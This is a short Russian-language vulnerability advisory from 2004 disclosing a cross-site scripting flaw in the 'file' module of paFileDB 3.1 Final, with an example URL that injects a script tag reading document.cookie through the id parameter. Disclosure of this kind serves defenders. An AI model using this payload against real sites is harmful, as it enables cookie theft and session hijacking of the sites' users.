Межсайтовый скриптинг в paFileDB

Дата публикации:27.09.2004
Всего просмотров:881
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: paFileDB 3.1 Final

Описание: Уязвимость обнаружена в paFileDB в модуле 'file'. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/downloads/pafiledb.php?action=file&id=1?%22><script>alert(document.cookie)</scr ipt>

URL производителя: http://www.phparena.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: New XSS vulnerabilities in paFileDB 3.1 final